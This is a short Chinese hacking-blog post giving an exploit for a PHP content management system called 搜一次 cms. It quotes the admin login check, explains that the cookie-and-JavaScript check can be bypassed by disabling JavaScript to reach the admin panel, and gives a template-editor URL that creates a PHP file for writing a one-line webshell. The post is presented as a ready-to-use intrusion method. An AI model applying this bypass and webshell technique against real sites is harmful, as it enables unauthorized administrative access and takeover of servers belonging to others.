搜一次 cms php 通杀

作者：hack1990 时间：12-03-07 阅读数：598人阅读

漏洞文件 admin 目录下的 admin_loginstate.php

看代码

if(empty($_COOKIE['S_AdminID'])){
echo "<script>window.location='admin_login.php'</script>";
exit;
}
elseif($_COOKIE['S_Login']!=md5($_COOKIE['S_AdminID'].$_COOKIE['S_AdminUserName'].$_COOKIE['S_AdminPassWord'].$_COOKIE['S_Permission'])){
echo "<script>window.parent.location='admin_login.php'</script>";
exit;
}
?>很简单的看出来是 cookie验证我们直接禁止JS可直接进后台

进后台后简单的说下拿shell的方法

/admin/admin_template.php?action=templist&path=../skins/index/html/&tempname=默认模版&file=qingshen.php

直接访问这个url 然后写个一句话就可以了目录当然是在 /skins/index/html/ 目录下的

# Nmap Security Scanner 7.0

上一篇：一夜情作战攻略

下一篇：手机版熊猫烧香袭卷Android - “功夫熊猫”2012最活跃

搜一次 cms php 通杀

相关文章

发表评论